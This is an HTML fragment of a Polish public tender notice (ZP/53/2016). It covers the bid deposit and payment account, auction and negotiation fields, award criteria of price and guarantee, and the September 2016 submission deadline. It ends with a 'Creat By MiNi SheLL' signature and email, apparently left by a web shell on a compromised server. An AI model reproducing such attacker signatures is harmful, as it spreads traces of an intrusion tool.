                  <br />1.Warunkiem udziału w postępowaniu jest wniesienie wadium na okres związania ofertą na kwotę/wartość: 4.000,00 zł (słownie cztery tysiące złotych 00/100); 2.Wadium może być wnoszone w jednej lub kilku następujących formach: 1)pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3)gwarancjach bankowych; 4)gwarancjach ubezpieczeniowych; 5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. nr 42, poz. 275). 3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: Wadium wnoszone w pieniądzu należy wpłacić na rachunek: bankowy Zamawiającego prowadzony: Narodowy Bank Polski Oddział Okręgowy Rzeszów nr 98 1010 1528 0018 9213 9120 0000  z adnotacją wadium w przetargu nr ZP/53/2016, NIP [Wykonawcy]).</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 22/09/2016, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com